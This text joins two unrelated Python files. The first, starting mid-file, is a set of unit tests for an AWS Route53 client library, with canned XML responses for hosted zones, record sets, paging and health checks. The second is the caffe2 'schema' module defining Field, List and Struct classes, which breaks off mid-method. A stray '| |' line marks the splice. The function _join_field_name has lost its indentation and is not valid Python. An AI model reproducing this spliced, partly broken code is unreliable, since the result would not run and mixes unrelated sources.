        <ResourceRecordSetCount>3</ResourceRecordSetCount>
    </HostedZone>
    <DelegationSet>
        <NameServers>
            <NameServer>ns-1000.awsdns-40.org</NameServer>
            <NameServer>ns-200.awsdns-30.com</NameServer>
            <NameServer>ns-900.awsdns-50.net</NameServer>
            <NameServer>ns-1000.awsdns-00.co.uk</NameServer>
        </NameServers>
    </DelegationSet>
</GetHostedZoneResponse>
"""
    def test_list_zones(self):
        # get_hosted_zone returns the parsed dict, including the
        # delegation set's name servers in document order.
        self.set_http_response(status_code=201)
        response = self.service_connection.get_hosted_zone("Z1111")
        self.assertEqual(response['GetHostedZoneResponse']['HostedZone']['Id'], '/hostedzone/Z1111')
        self.assertEqual(response['GetHostedZoneResponse']['HostedZone']['Name'], 'example.com.')
        self.assertEqual(response['GetHostedZoneResponse']['DelegationSet']['NameServers'],
                         ['ns-1000.awsdns-40.org', 'ns-200.awsdns-30.com', 'ns-900.awsdns-50.net', 'ns-1000.awsdns-00.co.uk'])
@attr(route53=True)
class TestGetAllRRSetsRoute53(AWSMockServiceTestCase):
    """get_all_rrsets parsing of plain, alias, latency and failover records."""
    connection_class = Route53Connection
    def setUp(self):
        super(TestGetAllRRSetsRoute53, self).setUp()
    def default_body(self):
        # Canned ListResourceRecordSetsResponse covering a plain A record,
        # alias records with and without target-health evaluation, a
        # failover record and a health-checked alias record.
        return b"""
<ListResourceRecordSetsResponse xmlns="https://route53.amazonaws.com/doc/2013-04-01/">
  <ResourceRecordSets>
    <ResourceRecordSet>
      <Name>test.example.com.</Name>
      <Type>A</Type>
      <TTL>60</TTL>
      <ResourceRecords>
        <ResourceRecord>
          <Value>10.0.0.1</Value>
        </ResourceRecord>
      </ResourceRecords>
    </ResourceRecordSet>
    <ResourceRecordSet>
      <Name>www.example.com.</Name>
      <Type>A</Type>
      <TTL>60</TTL>
      <ResourceRecords>
        <ResourceRecord>
          <Value>10.0.0.2</Value>
        </ResourceRecord>
      </ResourceRecords>
    </ResourceRecordSet>
    <ResourceRecordSet>
      <Name>us-west-2-evaluate-health.example.com.</Name>
      <Type>A</Type>
      <SetIdentifier>latency-example-us-west-2-evaluate-health</SetIdentifier>
      <Region>us-west-2</Region>
      <AliasTarget>
        <HostedZoneId>ABCDEFG123456</HostedZoneId>
        <EvaluateTargetHealth>true</EvaluateTargetHealth>
        <DNSName>example-123456-evaluate-health.us-west-2.elb.amazonaws.com.</DNSName>
      </AliasTarget>
      <HealthCheckId>abcdefgh-abcd-abcd-abcd-abcdefghijkl</HealthCheckId>
    </ResourceRecordSet>
    <ResourceRecordSet>
      <Name>us-west-2-no-evaluate-health.example.com.</Name>
      <Type>A</Type>
      <SetIdentifier>latency-example-us-west-2-no-evaluate-health</SetIdentifier>
      <Region>us-west-2</Region>
      <AliasTarget>
        <HostedZoneId>ABCDEFG567890</HostedZoneId>
        <EvaluateTargetHealth>false</EvaluateTargetHealth>
        <DNSName>example-123456-no-evaluate-health.us-west-2.elb.amazonaws.com.</DNSName>
      </AliasTarget>
      <HealthCheckId>abcdefgh-abcd-abcd-abcd-abcdefghijkl</HealthCheckId>
    </ResourceRecordSet>
    <ResourceRecordSet>
      <Name>failover.example.com.</Name>
      <Type>A</Type>
      <SetIdentifier>failover-primary</SetIdentifier>
      <Failover>PRIMARY</Failover>
      <TTL>60</TTL>
      <ResourceRecords>
        <ResourceRecord>
          <Value>10.0.0.4</Value>
        </ResourceRecord>
      </ResourceRecords>
    </ResourceRecordSet>
    <ResourceRecordSet>
      <Name>us-west-2-evaluate-health-healthcheck.example.com.</Name>
      <Type>A</Type>
      <SetIdentifier>latency-example-us-west-2-evaluate-health-healthcheck</SetIdentifier>
      <Region>us-west-2</Region>
      <AliasTarget>
        <HostedZoneId>ABCDEFG123456</HostedZoneId>
        <EvaluateTargetHealth>true</EvaluateTargetHealth>
        <DNSName>example-123456-evaluate-health-healthcheck.us-west-2.elb.amazonaws.com.</DNSName>
      </AliasTarget>
      <HealthCheckId>076a32f8-86f7-4c9e-9fa2-c163d5be67d9</HealthCheckId>
    </ResourceRecordSet>
  </ResourceRecordSets>
  <IsTruncated>false</IsTruncated>
  <MaxItems>100</MaxItems>
</ListResourceRecordSetsResponse>
"""
    def test_get_all_rr_sets(self):
        self.set_http_response(status_code=200)
        response = self.service_connection.get_all_rrsets("Z1111", "A", "example.com.")
        # Query-string ordering is not guaranteed, so accept either form.
        self.assertIn(self.actual_request.path,
                      ("/2013-04-01/hostedzone/Z1111/rrset?type=A&name=example.com.",
                       "/2013-04-01/hostedzone/Z1111/rrset?name=example.com.&type=A"))
        self.assertTrue(isinstance(response, ResourceRecordSets))
        self.assertEqual(response.hosted_zone_id, "Z1111")
        self.assertTrue(isinstance(response[0], Record))
        # BUG FIX: these used assertTrue(value, msg) — the second argument
        # is the failure message, so the checks could never fail. They are
        # meant to be equality assertions.
        self.assertEqual(response[0].name, "test.example.com.")
        self.assertEqual(response[0].ttl, "60")
        self.assertEqual(response[0].type, "A")
        evaluate_record = response[2]
        self.assertEqual(evaluate_record.name, 'us-west-2-evaluate-health.example.com.')
        self.assertEqual(evaluate_record.type, 'A')
        self.assertEqual(evaluate_record.identifier, 'latency-example-us-west-2-evaluate-health')
        self.assertEqual(evaluate_record.region, 'us-west-2')
        self.assertEqual(evaluate_record.alias_hosted_zone_id, 'ABCDEFG123456')
        self.assertTrue(evaluate_record.alias_evaluate_target_health)
        self.assertEqual(evaluate_record.alias_dns_name, 'example-123456-evaluate-health.us-west-2.elb.amazonaws.com.')
        evaluate_xml = evaluate_record.to_xml()
        # BUG FIX: assertTrue(value, msg) -> assertEqual.
        self.assertEqual(evaluate_record.health_check, 'abcdefgh-abcd-abcd-abcd-abcdefghijkl')
        self.assertTrue('<EvaluateTargetHealth>true</EvaluateTargetHealth>' in evaluate_xml)
        no_evaluate_record = response[3]
        self.assertEqual(no_evaluate_record.name, 'us-west-2-no-evaluate-health.example.com.')
        self.assertEqual(no_evaluate_record.type, 'A')
        self.assertEqual(no_evaluate_record.identifier, 'latency-example-us-west-2-no-evaluate-health')
        self.assertEqual(no_evaluate_record.region, 'us-west-2')
        self.assertEqual(no_evaluate_record.alias_hosted_zone_id, 'ABCDEFG567890')
        self.assertFalse(no_evaluate_record.alias_evaluate_target_health)
        self.assertEqual(no_evaluate_record.alias_dns_name, 'example-123456-no-evaluate-health.us-west-2.elb.amazonaws.com.')
        no_evaluate_xml = no_evaluate_record.to_xml()
        # BUG FIX: assertTrue(value, msg) -> assertEqual.
        self.assertEqual(no_evaluate_record.health_check, 'abcdefgh-abcd-abcd-abcd-abcdefghijkl')
        self.assertTrue('<EvaluateTargetHealth>false</EvaluateTargetHealth>' in no_evaluate_xml)
        failover_record = response[4]
        self.assertEqual(failover_record.name, 'failover.example.com.')
        self.assertEqual(failover_record.type, 'A')
        self.assertEqual(failover_record.identifier, 'failover-primary')
        self.assertEqual(failover_record.failover, 'PRIMARY')
        self.assertEqual(failover_record.ttl, '60')
        healthcheck_record = response[5]
        self.assertEqual(healthcheck_record.health_check, '076a32f8-86f7-4c9e-9fa2-c163d5be67d9')
        self.assertEqual(healthcheck_record.name, 'us-west-2-evaluate-health-healthcheck.example.com.')
        self.assertEqual(healthcheck_record.identifier, 'latency-example-us-west-2-evaluate-health-healthcheck')
        self.assertEqual(healthcheck_record.alias_dns_name, 'example-123456-evaluate-health-healthcheck.us-west-2.elb.amazonaws.com.')
@attr(route53=True)
class TestTruncatedGetAllRRSetsRoute53(AWSMockServiceTestCase):
    """get_all_rrsets must transparently follow truncated (paged) results."""
    connection_class = Route53Connection
    def setUp(self):
        super(TestTruncatedGetAllRRSetsRoute53, self).setUp()
    def default_body(self):
        # First page: truncated after three record sets; the NextRecord*
        # elements point at the weighted 'secondary' record on page two.
        return b"""
<ListResourceRecordSetsResponse xmlns="https://route53.amazonaws.com/doc/2013-04-01/">
    <ResourceRecordSets>
        <ResourceRecordSet>
            <Name>example.com.</Name>
            <Type>NS</Type>
            <TTL>900</TTL>
            <ResourceRecords>
                <ResourceRecord>
                    <Value>ns-91.awsdns-41.co.uk.</Value>
                </ResourceRecord>
                <ResourceRecord>
                    <Value>ns-1929.awsdns-93.net.</Value>
                </ResourceRecord>
                <ResourceRecord>
                    <Value>ns-12.awsdns-21.org.</Value>
                </ResourceRecord>
                <ResourceRecord>
                    <Value>ns-102.awsdns-96.com.</Value>
                </ResourceRecord>
            </ResourceRecords>
        </ResourceRecordSet>
        <ResourceRecordSet>
            <Name>example.com.</Name>
            <Type>SOA</Type>
            <TTL>1800</TTL>
            <ResourceRecords>
                <ResourceRecord>
                    <Value>ns-1929.awsdns-93.net. hostmaster.awsdns.net. 1 10800 3600 604800 1800</Value>
                </ResourceRecord>
            </ResourceRecords>
        </ResourceRecordSet>
        <ResourceRecordSet>
            <Name>wrr.example.com.</Name>
            <Type>A</Type>
            <SetIdentifier>primary</SetIdentifier>
            <Weight>100</Weight>
            <TTL>300</TTL>
            <ResourceRecords>
                <ResourceRecord><Value>127.0.0.1</Value></ResourceRecord>
            </ResourceRecords>
        </ResourceRecordSet>
    </ResourceRecordSets>
    <IsTruncated>true</IsTruncated>
    <NextRecordName>wrr.example.com.</NextRecordName>
    <NextRecordType>A</NextRecordType>
    <NextRecordIdentifier>secondary</NextRecordIdentifier>
    <MaxItems>3</MaxItems>
</ListResourceRecordSetsResponse>"""
    def paged_body(self):
        # Second (final) page holding the remaining weighted record.
        return b"""
<ListResourceRecordSetsResponse xmlns="https://route53.amazonaws.com/doc/2013-04-01/">
    <ResourceRecordSets>
        <ResourceRecordSet>
            <Name>wrr.example.com.</Name>
            <Type>A</Type>
            <SetIdentifier>secondary</SetIdentifier>
            <Weight>50</Weight>
            <TTL>300</TTL>
            <ResourceRecords>
                <ResourceRecord><Value>127.0.0.2</Value></ResourceRecord>
            </ResourceRecords>
        </ResourceRecordSet>
    </ResourceRecordSets>
    <IsTruncated>false</IsTruncated>
    <MaxItems>3</MaxItems>
</ListResourceRecordSetsResponse>"""
    def test_get_all_rr_sets(self):
        self.set_http_response(status_code=200)
        response = self.service_connection.get_all_rrsets("Z1111", maxitems=3)
        # made first request
        self.assertEqual(self.actual_request.path, '/2013-04-01/hostedzone/Z1111/rrset?maxitems=3')
        # anticipate a second request when we page it
        self.set_http_response(status_code=200, body=self.paged_body())
        # this should trigger another call to get_all_rrsets
        self.assertEqual(len(list(response)), 4)
        url_parts = urllib.parse.urlparse(self.actual_request.path)
        self.assertEqual(url_parts.path, '/2013-04-01/hostedzone/Z1111/rrset')
        # The follow-up request must resume at the NextRecord* position.
        self.assertEqual(urllib.parse.parse_qs(url_parts.query),
                         dict(type=['A'], name=['wrr.example.com.'], identifier=['secondary']))
@attr(route53=True)
class TestCreateHealthCheckRoute53IpAddress(AWSMockServiceTestCase):
    """Health-check creation keyed on an explicit IP address."""
    connection_class = Route53Connection
    def setUp(self):
        super(TestCreateHealthCheckRoute53IpAddress, self).setUp()
    def default_body(self):
        # Canned CreateHealthCheckResponse echoing the submitted config.
        return b"""
<CreateHealthCheckResponse xmlns="https://route53.amazonaws.com/doc/2013-04-01/">
    <HealthCheck>
        <Id>34778cf8-e31e-4974-bad0-b108bd1623d3</Id>
        <CallerReference>2fa48c8f-76ef-4253-9874-8bcb2b0d7694</CallerReference>
        <HealthCheckConfig>
            <IPAddress>74.125.228.81</IPAddress>
            <Port>443</Port>
            <Type>HTTPS_STR_MATCH</Type>
            <SearchString>OK</SearchString>
            <ResourcePath>/health_check</ResourcePath>
            <RequestInterval>30</RequestInterval>
            <FailureThreshold>3</FailureThreshold>
        </HealthCheckConfig>
    </HealthCheck>
</CreateHealthCheckResponse>
"""
    def test_create_health_check_ip_address(self):
        self.set_http_response(status_code=201)
        hc = HealthCheck(ip_addr='74.125.228.81', port=443,
                         hc_type='HTTPS_STR_MATCH',
                         resource_path='/health_check', string_match='OK')
        # An IP-based check serializes IPAddress and must omit the FQDN.
        hc_xml = hc.to_xml()
        self.assertFalse('<FullyQualifiedDomainName>' in hc_xml)
        self.assertTrue('<IPAddress>' in hc_xml)
        response = self.service_connection.create_health_check(hc)
        hc_resp = response['CreateHealthCheckResponse']['HealthCheck']['HealthCheckConfig']
        self.assertEqual(hc_resp['IPAddress'], '74.125.228.81')
        self.assertEqual(hc_resp['Type'], 'HTTPS_STR_MATCH')
        self.assertEqual(hc_resp['Port'], '443')
        # ResourcePath was previously asserted twice; checking it once is
        # sufficient.
        self.assertEqual(hc_resp['ResourcePath'], '/health_check')
        self.assertEqual(hc_resp['SearchString'], 'OK')
        self.assertEqual(response['CreateHealthCheckResponse']['HealthCheck']['Id'], '34778cf8-e31e-4974-bad0-b108bd1623d3')
@attr(route53=True)
class TestCreateHealthCheckRoute53FQDN(AWSMockServiceTestCase):
    """Health-check creation keyed on a fully-qualified domain name."""
    connection_class = Route53Connection
    def setUp(self):
        super(TestCreateHealthCheckRoute53FQDN, self).setUp()
    def default_body(self):
        # Canned CreateHealthCheckResponse echoing the submitted config.
        return b"""
<CreateHealthCheckResponse xmlns="https://route53.amazonaws.com/doc/2013-04-01/">
    <HealthCheck>
        <Id>f9abfe10-8d2a-4bbd-8f35-796f0f8572f2</Id>
        <CallerReference>3246ac17-b651-4295-a5c8-c132a59693d7</CallerReference>
        <HealthCheckConfig>
            <Port>443</Port>
            <Type>HTTPS</Type>
            <ResourcePath>/health_check</ResourcePath>
            <FullyQualifiedDomainName>example.com</FullyQualifiedDomainName>
            <RequestInterval>30</RequestInterval>
            <FailureThreshold>3</FailureThreshold>
        </HealthCheckConfig>
    </HealthCheck>
</CreateHealthCheckResponse>
"""
    def test_create_health_check_fqdn(self):
        self.set_http_response(status_code=201)
        hc = HealthCheck(ip_addr='', port=443, hc_type='HTTPS',
                         resource_path='/health_check', fqdn='example.com')
        # An FQDN-based check serializes the domain name and must omit the
        # IPAddress element.
        hc_xml = hc.to_xml()
        self.assertTrue('<FullyQualifiedDomainName>' in hc_xml)
        self.assertFalse('<IPAddress>' in hc_xml)
        response = self.service_connection.create_health_check(hc)
        hc_resp = response['CreateHealthCheckResponse']['HealthCheck']['HealthCheckConfig']
        self.assertEqual(hc_resp['FullyQualifiedDomainName'], 'example.com')
        self.assertEqual(hc_resp['Type'], 'HTTPS')
        self.assertEqual(hc_resp['Port'], '443')
        # ResourcePath was previously asserted twice; checking it once is
        # sufficient.
        self.assertEqual(hc_resp['ResourcePath'], '/health_check')
        self.assertEqual(response['CreateHealthCheckResponse']['HealthCheck']['Id'], 'f9abfe10-8d2a-4bbd-8f35-796f0f8572f2')
@attr(route53=True)
class TestChangeResourceRecordSetsRoute53(AWSMockServiceTestCase):
    """Serialization of a ChangeResourceRecordSets request batch."""
    connection_class = Route53Connection
    def setUp(self):
        super(TestChangeResourceRecordSetsRoute53, self).setUp()
    def default_body(self):
        # Canned ChangeResourceRecordSetsResponse (content is irrelevant to
        # this test; only the request XML is checked).
        return b"""
<ChangeResourceRecordSetsResponse xmlns="https://route53.amazonaws.com/doc/2013-04-01/">
    <ChangeInfo>
        <Id>/change/C1111111111111</Id>
        <Status>PENDING</Status>
        <SubmittedAt>2014-05-05T10:11:12.123Z</SubmittedAt>
    </ChangeInfo>
</ChangeResourceRecordSetsResponse>
"""
    def test_record_commit(self):
        # One change batch covering each record flavour: plain, alias,
        # weighted, latency and failover (with health check).
        rrsets = ResourceRecordSets(self.service_connection)
        rrsets.add_change_record('CREATE', Record('vanilla.example.com', 'A', 60, ['1.2.3.4']))
        rrsets.add_change_record('CREATE', Record('alias.example.com', 'AAAA', alias_hosted_zone_id='Z123OTHER', alias_dns_name='target.other', alias_evaluate_target_health=True))
        rrsets.add_change_record('CREATE', Record('wrr.example.com', 'CNAME', 60, ['cname.target'], weight=10, identifier='weight-1'))
        rrsets.add_change_record('CREATE', Record('lbr.example.com', 'TXT', 60, ['text record'], region='us-west-2', identifier='region-1'))
        rrsets.add_change_record('CREATE', Record('failover.example.com', 'A', 60, ['2.2.2.2'], health_check='hc-1234', failover='PRIMARY', identifier='primary'))
        changes_xml = rrsets.to_xml()
        # the whitespacing doesn't match exactly, so we'll pretty print and drop all new lines
        # not the best, but
        actual_xml = re.sub(r"\s*[\r\n]+", "\n", xml.dom.minidom.parseString(changes_xml).toprettyxml())
        expected_xml = re.sub(r"\s*[\r\n]+", "\n", xml.dom.minidom.parseString(b"""
<ChangeResourceRecordSetsRequest xmlns="https://route53.amazonaws.com/doc/2013-04-01/">
    <ChangeBatch>
        <Comment>None</Comment>
        <Changes>
            <Change>
                <Action>CREATE</Action>
                <ResourceRecordSet>
                    <Name>vanilla.example.com</Name>
                    <Type>A</Type>
                    <TTL>60</TTL>
                    <ResourceRecords>
                        <ResourceRecord>
                            <Value>1.2.3.4</Value>
                        </ResourceRecord>
                    </ResourceRecords>
                </ResourceRecordSet>
            </Change>
            <Change>
                <Action>CREATE</Action>
                <ResourceRecordSet>
                    <Name>alias.example.com</Name>
                    <Type>AAAA</Type>
                    <AliasTarget>
                        <HostedZoneId>Z123OTHER</HostedZoneId>
                        <DNSName>target.other</DNSName>
                        <EvaluateTargetHealth>true</EvaluateTargetHealth>
                    </AliasTarget>
                </ResourceRecordSet>
            </Change>
            <Change>
                <Action>CREATE</Action>
                <ResourceRecordSet>
                    <Name>wrr.example.com</Name>
                    <Type>CNAME</Type>
                    <SetIdentifier>weight-1</SetIdentifier>
                    <Weight>10</Weight>
                    <TTL>60</TTL>
                    <ResourceRecords>
                        <ResourceRecord>
                            <Value>cname.target</Value>
                        </ResourceRecord>
                    </ResourceRecords>
                </ResourceRecordSet>
            </Change>
            <Change>
                <Action>CREATE</Action>
                <ResourceRecordSet>
                    <Name>lbr.example.com</Name>
                    <Type>TXT</Type>
                    <SetIdentifier>region-1</SetIdentifier>
                    <Region>us-west-2</Region>
                    <TTL>60</TTL>
                    <ResourceRecords>
                        <ResourceRecord>
                            <Value>text record</Value>
                        </ResourceRecord>
                    </ResourceRecords>
                </ResourceRecordSet>
            </Change>
            <Change>
                <Action>CREATE</Action>
                <ResourceRecordSet>
                    <Name>failover.example.com</Name>
                    <Type>A</Type>
                    <SetIdentifier>primary</SetIdentifier>
                    <Failover>PRIMARY</Failover>
                    <TTL>60</TTL>
                    <ResourceRecords>
                        <ResourceRecord>
                            <Value>2.2.2.2</Value>
                        </ResourceRecord>
                    </ResourceRecords>
                    <HealthCheckId>hc-1234</HealthCheckId>
                </ResourceRecordSet>
            </Change>
        </Changes>
    </ChangeBatch>
</ChangeResourceRecordSetsRequest>
""").toprettyxml())
        # Note: the alias XML should not include the TTL, even if it's specified in the object model
        self.assertEqual(actual_xml, expected_xml)
| |
## @package schema
# Module caffe2.python.schema
"""
Defines a minimal set of data types that allow to represent datasets with
arbitrary nested structure, including objects of variable length, such as
maps and lists.
This defines a columnar storage format for such datasets on top of caffe2
tensors. In terms of capacity of representation, it can represent most of
the data types supported by Parquet, ORC, DWRF file formats.
See comments in operator_test/dataset_ops_test.py for an example and
walkthrough on how to use schema to store and iterate through a structured
in-memory dataset.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import numpy as np
from caffe2.python import core
from caffe2.python import workspace
from caffe2.python.core import BlobReference
from collections import OrderedDict, namedtuple
from past.builtins import basestring
from future.utils import viewitems, viewkeys, viewvalues
from itertools import islice
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
FIELD_SEPARATOR = ':'
def _join_field_name(prefix, suffix):
if prefix and suffix:
return '{}{}{}'.format(prefix, FIELD_SEPARATOR, suffix)
elif prefix:
return prefix
elif suffix:
return suffix
else:
return ''
def _normalize_field(field_or_type_or_blob, keep_blobs=True):
    """Clones/normalizes a field before adding it to a container.

    Accepts an existing Field (cloned), a type or numpy dtype (wrapped in a
    typed Scalar), or anything else (treated as a blob for a Scalar).
    """
    value = field_or_type_or_blob
    if isinstance(value, Field):
        return value.clone(keep_blobs=keep_blobs)
    # NOTE: exact type identity check (not isinstance) — only a bare `type`
    # or `np.dtype` instance counts as a dtype here.
    if type(value) in (type, np.dtype):
        return Scalar(dtype=value)
    return Scalar(blob=value)
# Describes the feature(s) carried by a Scalar field; used as the
# `feature_specs` entry of Metadata.
FeatureSpec = namedtuple(
    'FeatureSpec',
    [
        'feature_type',
        'feature_names',
        'feature_ids',
        'feature_is_request_only',
        'desired_hash_size',
    ]
)

# Make every FeatureSpec entry optional (defaults to None).
FeatureSpec.__new__.__defaults__ = (None, None, None, None, None)
class Metadata(
    namedtuple(
        'Metadata', ['categorical_limit', 'expected_value', 'feature_specs']
    )
):
    """Represents additional information associated with a scalar in schema.

    `categorical_limit` - for fields of integral type that are guaranteed to be
    non-negative it specifies the maximum possible value plus one. It's often
    used as a size of an embedding table.

    `expected_value` - anticipated average value of elements in the field.
    Usually makes sense for length fields of lists.

    `feature_specs` - information about the features contained in this
    field. For example, if the field holds more than one feature it can carry
    the list of feature names contained in this field."""
    __slots__ = ()

# Make every Metadata entry optional (defaults to None).
Metadata.__new__.__defaults__ = (None, None, None)
class Field(object):
    """Represents an abstract field type in a dataset.
    """

    def __init__(self, children):
        """Derived classes must call this after their initialization."""
        self._parent = (None, 0)
        offset = 0
        self._field_offsets = []
        # _field_offsets[i] is the index of child i's first scalar within this
        # field's flattened scalar list; the final entry is the total count.
        for child in children:
            self._field_offsets.append(offset)
            offset += len(child.field_names())
        self._field_offsets.append(offset)

    def clone_schema(self):
        # Clone the schema structure only, dropping any attached blobs.
        return self.clone(keep_blobs=False)

    def field_names(self):
        """Return the children field names for this field."""
        raise NotImplementedError('Field is an abstract class.')

    def field_types(self):
        """Return the numpy.dtype for each of the children fields."""
        raise NotImplementedError('Field is an abstract class.')

    def field_metadata(self):
        """Return the Metadata for each of the children fields."""
        raise NotImplementedError('Field is an abstract class.')

    def field_blobs(self):
        """Return the list of blobs with contents for this Field.
        Values can either be all numpy.ndarray or BlobReference.
        If any of the fields doesn't have a blob, throws.
        """
        raise NotImplementedError('Field is an abstract class.')

    def all_scalars(self):
        """Return the list of all Scalar instances in the Field.
        The order is the same as for field_names() or field_blobs()"""
        raise NotImplementedError('Field is an abstract class.')

    def has_blobs(self):
        """Return True if every scalar of this field has blobs."""
        raise NotImplementedError('Field is an abstract class.')

    def clone(self, keep_blobs=True):
        """Clone this Field along with its children."""
        raise NotImplementedError('Field is an abstract class.')

    def _set_parent(self, parent, relative_id):
        # Record the containing field and this field's index within it, so
        # absolute scalar positions can be computed by _child_base_id().
        self._parent = (parent, relative_id)

    def slice(self):
        """
        Returns a slice representing the range of field ids that belong to
        this field. This slice can be used to index a list of fields.

        E.g.:

        >>> s = Struct(
        >>>     ('a', Scalar()),
        >>>     ('b', Struct(
        >>>         ('b1', Scalar()),
        >>>         ('b2', Scalar()),
        >>>     )),
        >>>     ('c', Scalar()),
        >>> )
        >>> field_data = ['da', 'db1', 'db2', 'dc']
        >>> field_data[s.b.slice()]
        ['db1', 'db2']
        """
        base_id = self._child_base_id()
        return slice(base_id, base_id + len(self.field_names()))

    def _child_base_id(self, child_index=None):
        """Get the base id of the given child"""
        p, i = self._parent
        pos = 0 if child_index is None else self._field_offsets[child_index]
        # Accumulate offsets up the parent chain to get an absolute position.
        if p:
            pos += p._child_base_id(i)
        return pos

    def __eq__(self, other):
        """Equivalence of two schemas"""
        # NOTE(review): __eq__ without __hash__ makes instances unhashable on
        # Python 3 — presumably intentional for mutable schemas; confirm.
        return (
            (self.field_names() == other.field_names()) and
            (self.field_types() == other.field_types()) and
            (self.field_metadata() == other.field_metadata())
        )
class List(Field):
    """Represents a variable-length list.

    Values of a list can also be complex fields such as Lists and Structs.
    In addition to the fields exposed by its `values` field, a List exposes an
    additional `lengths` field, which will contain the size of each list under
    the parent domain.
    """

    def __init__(self, values, lengths_blob=None):
        # `lengths_blob` may be a ready-made Scalar field or a raw blob; in
        # the latter case an int32 lengths Scalar is created around it.
        if isinstance(lengths_blob, Field):
            assert isinstance(lengths_blob, Scalar)
            self.lengths = _normalize_field(lengths_blob)
        else:
            self.lengths = Scalar(np.int32, lengths_blob)
        self._items = _normalize_field(values)
        # lengths is child 0, values child 1 — matches field_names() order.
        self.lengths._set_parent(self, 0)
        self._items._set_parent(self, 1)
        Field.__init__(self, [self.lengths, self._items])

    def field_names(self):
        value_fields = self._items.field_names()
        return (
            ['lengths'] + [_join_field_name('values', v) for v in value_fields]
        )

    def field_types(self):
        return self.lengths.field_types() + self._items.field_types()

    def field_metadata(self):
        return self.lengths.field_metadata() + self._items.field_metadata()

    def field_blobs(self):
        return self.lengths.field_blobs() + self._items.field_blobs()

    def all_scalars(self):
        return self.lengths.all_scalars() + self._items.all_scalars()

    def has_blobs(self):
        return self.lengths.has_blobs() and self._items.has_blobs()

    def clone(self, keep_blobs=True):
        # Arguments are (values, lengths_blob) — matches __init__'s order.
        return List(
            _normalize_field(self._items, keep_blobs=keep_blobs),
            _normalize_field(self.lengths, keep_blobs=keep_blobs)
        )

    def __repr__(self):
        return "List(lengths={!r}, _items={!r})".format(
            self.lengths, self._items)

    def __getattr__(self, item):
        """If the value of this list is a struct,
        allow to introspect directly into its fields."""
        if item.startswith('__'):
            raise AttributeError(item)
        if isinstance(self._items, Struct):
            return getattr(self._items, item)
        elif item == 'value' or item == 'items':
            return self._items
        else:
            raise AttributeError('Field not found in list: %s.' % item)

    def __getitem__(self, item):
        # Supports 'lengths', 'values', and nested names like 'values:x'.
        names = item.split(FIELD_SEPARATOR, 1)

        if len(names) == 1:
            if item == 'lengths':
                return self.lengths
            elif item == 'values':
                return self._items
        else:
            if names[0] == 'values':
                return self._items[names[1]]
        raise KeyError('Field not found in list: %s.' % item)
class Struct(Field):
    """Represents a named list of fields sharing the same domain.
    """

    def __init__(self, *fields):
        """ fields is a list of tuples in format of (name, field). The name is
        a string of nested name, e.g., `a`, `a:b`, `a:b:c`. For example

        Struct(
            ('a', Scalar()),
            ('b:c', Scalar()),
            ('b:d:e', Scalar()),
            ('b', Struct(
                ('f', Scalar()),
            )),
        )

        is equal to

        Struct(
            ('a', Scalar()),
            ('b', Struct(
                ('c', Scalar()),
                ('d', Struct(('e', Scalar()))),
                ('f', Scalar()),
            )),
        )
        """
        for field in fields:
            assert len(field) == 2
            assert field[0], 'Field names cannot be empty'
            # `lengths` is reserved: List exposes it next to its values'
            # fields, so allowing it here would be ambiguous.
            assert field[0] != 'lengths', (
                'Struct cannot contain a field named `lengths`.'
            )
        fields = [(name, _normalize_field(field)) for name, field in fields]
        self.fields = OrderedDict()
        for name, field in fields:
            # Expand nested names like `a:b:c` into nested Structs.
            if FIELD_SEPARATOR in name:
                name, field = self._struct_from_nested_name(name, field)
            if name not in self.fields:
                self.fields[name] = field
                continue
            # Duplicate names are only allowed when both are Structs, which
            # are then merged recursively via __add__.
            if (
                not isinstance(field, Struct) or
                not isinstance(self.fields[name], Struct)
            ):
                raise ValueError('Duplicate field name: %s' % name)
            self.fields[name] = self.fields[name] + field
        for id, (_, field) in enumerate(viewitems(self.fields)):
            field._set_parent(self, id)
        Field.__init__(self, viewvalues(self.fields))
        # Freeze attribute assignment; see __setattr__.
        self._frozen = True

    def _struct_from_nested_name(self, nested_name, field):
        # Turn `a:b:c` + field into ('a', Struct(b=Struct(c=field))).
        def create_internal(nested_name, field):
            names = nested_name.split(FIELD_SEPARATOR, 1)
            if len(names) == 1:
                added_field = field
            else:
                added_field = create_internal(names[1], field)
            return Struct((names[0], added_field))

        names = nested_name.split(FIELD_SEPARATOR, 1)
        assert len(names) >= 2
        return names[0], create_internal(names[1], field)

    def get_children(self):
        # Immediate (name, field) pairs of this Struct, in insertion order.
        return list(viewitems(self.fields))

    def field_names(self):
        names = []
        for name, field in viewitems(self.fields):
            names += [_join_field_name(name, f) for f in field.field_names()]
        return names

    def field_types(self):
        types = []
        for _, field in viewitems(self.fields):
            types += field.field_types()
        return types

    def field_metadata(self):
        metadata = []
        for _, field in viewitems(self.fields):
            metadata += field.field_metadata()
        return metadata

    def field_blobs(self):
        blobs = []
        for _, field in viewitems(self.fields):
            blobs += field.field_blobs()
        return blobs

    def all_scalars(self):
        scalars = []
        for _, field in viewitems(self.fields):
            scalars += field.all_scalars()
        return scalars

    def has_blobs(self):
        return all(field.has_blobs() for field in viewvalues(self.fields))

    def clone(self, keep_blobs=True):
        normalized_fields = [
            (k, _normalize_field(v, keep_blobs=keep_blobs))
            for k, v in viewitems(self.fields)
        ]
        return Struct(*normalized_fields)

    def _get_field_by_nested_name(self, nested_name):
        # Resolve a possibly-nested name like `a:b:c`; None when not found.
        names = nested_name.split(FIELD_SEPARATOR, 1)
        field = self.fields.get(names[0], None)

        if field is None:
            return None

        if len(names) == 1:
            return field

        try:
            return field[names[1]]
        except (KeyError, TypeError):
            return None

    def __repr__(self):
        return "Struct({})".format(
            ', '.join(
                "{}={!r}".format(name, field)
                for name, field in viewitems(self.fields)
            )
        )

    def __contains__(self, item):
        field = self._get_field_by_nested_name(item)
        return field is not None

    def __len__(self):
        return len(self.fields)

    def __getitem__(self, item):
        """
        item can be a tuple or list of ints or strings, or a single
        int or string. String item is a nested field name, e.g., "a", "a:b",
        "a:b:c". Int item is the index of a field at the first level of the
        Struct.
        """
        if isinstance(item, list) or isinstance(item, tuple):
            # Sub-select: build a new Struct with just the requested fields.
            keys = list(viewkeys(self.fields))
            return Struct(
                * [
                    (
                        keys[k]
                        if isinstance(k, int) else k, self[k]
                    ) for k in item
                ]
            )
        elif isinstance(item, int):
            return next(islice(viewvalues(self.fields), item, None))
        else:
            field = self._get_field_by_nested_name(item)
            if field is None:
                raise KeyError('field "%s" not found' % (item))
            return field

    def __getattr__(self, item):
        # Only reached for names missing from normal lookup; exposes schema
        # fields as attributes (e.g. s.a.b).
